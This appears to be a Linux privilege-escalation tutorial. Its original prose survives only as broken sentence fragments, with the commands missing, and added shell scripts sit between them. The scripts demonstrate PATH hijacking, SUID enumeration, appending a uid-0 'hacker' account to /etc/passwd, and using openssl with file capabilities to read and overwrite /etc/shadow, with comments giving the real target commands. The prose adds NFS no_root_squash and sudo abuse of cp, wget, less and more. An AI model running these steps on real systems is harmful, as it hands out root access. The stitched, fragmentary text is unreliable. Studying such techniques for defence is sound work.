netstat and compare the results with the nmap scan from the outside to see if there are additional services available inside:
strings on them to see if they have interesting text inside.
./script to run something. They do this by adding
ls in a folder that changes the root password when the
ls command is executed there.
. in your PATH can also help an attacker who is exploiting programs that make system(), execvp(), or execlp() calls: if the program does not specify the full path of the program it runs, the attacker can place a program of that name into a directory in the PATH so that the attacker's program is run instead. This works because programmers simply expect that the program they mean to run will be the one found in the PATH.
. to your PATH:
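An added, self-contained demonstration of the PATH hijack described above (example code, not from the original page): a victim script stands in for a SUID program that calls `ls` by bare name, the attacker drops a program named `ls` into a directory that `.` in PATH points at, and a hardened variant of the victim uses an absolute path. The victim scripts, the fake `ls` and the `real_file` marker are constructed for the demo; nothing outside a temporary directory is touched.

```shell
# Build a throwaway lab: attacker dir, a data dir the real ls should list,
# an unsafe victim (bare "ls") and a safe victim (absolute /bin/ls).
make_lab() {
  lab=$(mktemp -d)
  mkdir "$lab/attacker" "$lab/data"
  : > "$lab/data/real_file"                        # what the real ls shows
  # Attacker-controlled program named "ls". A real payload would add a root
  # user or set a SUID shell; here it only announces itself.
  printf '#!/bin/sh\necho HIJACKED\n' > "$lab/attacker/ls"
  chmod 755 "$lab/attacker/ls"
  # Victim stands in for a program doing system("ls <dir>"): the name "ls"
  # is resolved through PATH at run time, so whatever comes first wins.
  printf '#!/bin/sh\nls "$1"\n' > "$lab/victim_unsafe"
  # Hardened variant: absolute path, PATH is never consulted.
  printf '#!/bin/sh\n/bin/ls "$1"\n' > "$lab/victim_safe"
  chmod 755 "$lab/victim_unsafe" "$lab/victim_safe"
  echo "$lab"
}

# Run a victim from inside the attacker's directory with "." first in PATH,
# which is exactly the situation the text warns about.
run_as_victim() {   # $1 = lab dir, $2 = victim script name
  ( cd "$1/attacker" && PATH=".:$PATH" "$1/$2" "$1/data" )
}

unsafe_result() { lab=$(make_lab); run_as_victim "$lab" victim_unsafe; rm -rf "$lab"; }
safe_result()   { lab=$(make_lab); run_as_victim "$lab" victim_safe;   rm -rf "$lab"; }

unsafe_result   # prints: HIJACKED   (attacker's ls ran)
safe_result     # prints: real_file  (real ls ran)
```

The same fix applies to real SUID programs: either call helpers by absolute path or reset PATH to a known value (for example /usr/bin:/bin) before any system() or exec*p() call, and never trust the PATH inherited from an unprivileged caller.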
/tmp/share and look for interesting files. Test whether you can create files, then check with your low-privilege shell which user owns the file you created. If it is owned by root, the export does not squash root (no_root_squash), so you can create a file from your attacking machine, set the SUID bit on it there, and then execute it with your low-privilege shell.
sudo you might be able to escalate your privileges with any program that can write or overwrite files. For example, if you have sudo rights to
cp you can overwrite
/etc/sudoers with your own malicious file.
wget you can use it in combination with python's SimpleHTTPServer (http.server on Python 3) to overwrite
/etc/shadow using the following commands:
less you can go into vi (press v), and from there into a shell:
more with a file that is bigger than your screen (more only shows its prompt, and therefore only accepts commands, when the file does not fit on one screen):
nmap, which both need root permissions to open raw network sockets and craft network packets. In general, this enhances security because you can grant root privileges to a single application instead of to a user account. However, SUID becomes a serious security issue when that application is able to execute commands or edit files.
leafpad. Configuring these programs to execute as root would be a serious security vulnerability because any user could edit any file on the system.
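An added example (not from the original page) of the SUID hunt the text describes: list SUID regular files below a directory and flag those whose names are on a watch list of programs that can run commands or write files. The watch list and the fake binaries in the rehearsal are constructed for the demo; on a real target you would run `audit_suid /`.

```shell
# Names worth a second look when found SUID: copiers, pagers, editors,
# interpreters and network tools that can execute commands or write files.
INTERESTING='cp mv less more vim vi nano leafpad find bash sh python perl nmap'

# List SUID regular files below $1 (on a real target: list_suid /).
list_suid() {
  find "$1" -type f -perm -4000 2>/dev/null
}

# Print "path (interesting)" or "path" for each SUID file below $1, sorted.
audit_suid() {
  list_suid "$1" | sort | while IFS= read -r f; do
    name=${f##*/}
    case " $INTERESTING " in
      *" $name "*) printf '%s (interesting)\n' "$f" ;;
      *)           printf '%s\n' "$f" ;;
    esac
  done
}

# Rehearsal on a constructed tree. Setting the SUID bit on your own files
# needs no privileges, so this runs as a normal user.
rehearse_audit() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/bin" "$tmp/usr/bin"
  : > "$tmp/bin/ping"; : > "$tmp/usr/bin/leafpad"; : > "$tmp/bin/cat"
  chmod u+s "$tmp/bin/ping" "$tmp/usr/bin/leafpad"   # cat stays non-SUID
  audit_suid "$tmp" | sed "s#^$tmp##"   # strip the temp prefix for readable output
  rm -rf "$tmp"
}

rehearse_audit
# prints:
# /bin/ping
# /usr/bin/leafpad (interesting)
```

Keep in mind that modern distributions usually ship ping with the cap_net_raw file capability instead of the SUID bit, so a SUID-only search misses that class of binary; the capabilities check later in the text covers it.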
/etc/passwd to change the root password.
/etc directory. For example, the entry for root looks like this:
x means that the actual password is stored in
/etc/shadow, but you can replace the x with a crypt(3) hash generated from a password and a salt
ctrl+x and hit Enter. Use the
su command to switch to the newly created user:
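An added example (not from the original page) that carries the /etc/passwd steps above through end to end: generate the crypt(3) hash with openssl, build a complete seven-field entry with uid 0, and rehearse the append on a constructed copy of the file so nothing on the host changes. The user name "hacker", the password "Password123" and the salt "xyz" are made-up values for the demo.

```shell
# crypt(3)-style MD5 hash ($1$salt$hash); /etc/passwd accepts it in the
# second field in place of "x", in which case /etc/shadow is not consulted.
make_hash() {   # $1 = password, $2 = salt
  openssl passwd -1 -salt "$2" "$1"
}

# Full entry: name:hash:uid:gid:gecos:home:shell. uid 0 and gid 0 make the
# account root-equivalent regardless of its name.
build_entry() {   # $1 = user, $2 = password, $3 = salt
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$(make_hash "$2" "$3")"
}

# Rehearsal on a constructed passwd file, then parse the new line back to
# confirm it has seven fields, uid 0 and the expected hash prefix.
rehearse() {
  tmp=$(mktemp -d)
  printf 'root:x:0:0:root:/root:/bin/bash\n' > "$tmp/passwd"   # constructed
  build_entry hacker Password123 xyz >> "$tmp/passwd"
  # on the target this would be: build_entry hacker Password123 xyz >> /etc/passwd
  # followed by: su hacker
  awk -F: '$1=="hacker" {print NF, $3, substr($2,1,7)}' "$tmp/passwd"
  rm -rf "$tmp"
}

rehearse   # prints: 7 0 $1$xyz$
```

A malformed line (wrong field count, a colon inside the hash) silently breaks the login, so parsing the entry back before you rely on it is worth the extra second; the same awk check works against the real file.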
tomcat/s3cret), or password files for other users are stored in the users'
wp-config.php respectively. These configuration files include valuable information such as the MySQL username and password. Web administrators often re-use passwords for system accounts.
setcap, and query these using
+ep means you are adding the capability ("-" would remove it) as Effective and Permitted.
openssl hidden somewhere (a user's home folder, for example), you could use it to read any file you wanted, like this:
/etc/shadow to change the root password. Since we already have the original file, all we need to do is change the root password in our copy and then abuse openssl's encrypt/decrypt functions to write it back.
/home/mydummyuser/shadow.custom, we first need to encrypt it (so that there is something to decrypt):
su - root, et voilà!
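An added example (not from the original page) that serves both the read-any-file passage and the shadow-overwrite steps above: openssl's encrypt/decrypt round trip used as a file copy, rehearsed on temporary files so it runs without privileges. On a target where the openssl binary carries cap_dac_read_search+ep the read helper works on any file, and with cap_dac_override+ep the decrypt step with -out /etc/shadow writes the crafted file in place. The cipher, the throwaway passphrase and the fake shadow lines are choices made for this demo.

```shell
PASS='pass:throwaway'   # confidentiality is irrelevant; openssl just needs a key

# Read any file the openssl binary may open: encrypt to stdout, decrypt in a
# pipe. On the target the first openssl is the one carrying the capability.
read_via_openssl() {   # $1 = file (on the target: /etc/shadow)
  openssl enc -aes-256-cbc -pbkdf2 -pass "$PASS" -in "$1" |
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "$PASS"
}

# Step 1: encrypt the crafted file so that there is something to decrypt.
enc_file() {   # $1 = plaintext in, $2 = ciphertext out
  openssl enc -aes-256-cbc -pbkdf2 -pass "$PASS" -in "$1" -out "$2"
}

# Step 2: decrypt to the destination. openssl, not the shell, opens $2 for
# writing, which is why a file capability on openssl alone is enough.
dec_to() {     # $1 = ciphertext in, $2 = destination (on the target: /etc/shadow)
  openssl enc -d -aes-256-cbc -pbkdf2 -pass "$PASS" -in "$1" -out "$2"
}

rehearse_shadow_write() {
  tmp=$(mktemp -d)
  # stand-in for /home/mydummyuser/shadow.custom: root line with a hash we chose
  printf 'root:%s:19000:0:99999:7:::\n' "$(openssl passwd -6 -salt abc Password123)" \
    > "$tmp/shadow.custom"
  # stand-in for the protected /etc/shadow (root locked out)
  printf 'root:*:19000:0:99999:7:::\n' > "$tmp/shadow"
  enc_file "$tmp/shadow.custom" "$tmp/shadow.enc"
  dec_to "$tmp/shadow.enc" "$tmp/shadow"
  if [ "$(cat "$tmp/shadow")" = "$(cat "$tmp/shadow.custom")" ]; then
    echo replaced
  else
    echo unchanged
  fi
  rm -rf "$tmp"
}

rehearse_shadow_write   # prints: replaced
```

Before trying this on a target, confirm the capability is actually set on the binary you found (getcap on its path) and that it is the Effective set, not only Permitted; a copy of openssl in a home directory carries no capabilities unless someone ran setcap on that exact file.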